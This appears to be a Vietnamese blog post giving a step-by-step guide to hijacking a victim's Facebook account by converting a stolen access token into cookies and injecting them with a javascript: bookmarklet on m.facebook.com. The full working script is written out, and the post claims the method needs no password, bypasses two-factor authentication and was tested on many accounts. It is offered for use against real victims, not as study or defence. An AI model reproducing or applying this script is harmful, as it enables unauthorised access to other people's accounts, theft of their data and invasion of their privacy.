Bước 1: Check token nick victim
Bước 2: Chuyển đổi token -> cookie nhé ( cái này tự tìm hiểu )
Bước 3: Lên trình duyệt có hỗ trợ javascript nhập đường link: http://m.facebook.com Bước 4: nhập mã code ở vị trí : (http://m.facebook.com)= mã code
 Mã code: javascript:void(function(){ function setCookie(t) { var list = t.split("; "); console.log(list); for (var i = list.length - 1; i >= 0; i--) { var cname = list[i].split("=")[0]; var cvalue = list[i].split("=")[1]; var d = new Date(); d.setTime(d.getTime() + (7*24*60*60*1000)); var expires = ";domain=.facebook.com;expires="+ d.toUTCString(); document.cookie = cname + "=" + cvalue + "; " + expires; } } function hex2a(hex) { var str = ''; for (var i = 0; i < hex.length; i += 2) { var v = parseInt(hex.substr(i, 2), 16); if (v) str += String.fromCharCode(v); } return str; } var cookie = prompt("Nhập cookie vào bên dưới để đăng nhập", ""); setCookie(cookie); location.href = 'https://facebook.com'; })();
Bước 5: Nó sẽ hiện ra 1 khung thì hãy nhập cookie vào và đăng nhập vào fb của victim
 Lưu ý : cách này gọi là xâm nhập tài khoản fb không cầ mật khẩu và tài khoản và vượt xác thực 2 yếu tố
 Đã test😆😆 trên nhiều nick bảo mậ
CHUYÊN MỤC
- - 0 Bình luận - Lượt xem

Bình luận bài viết (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé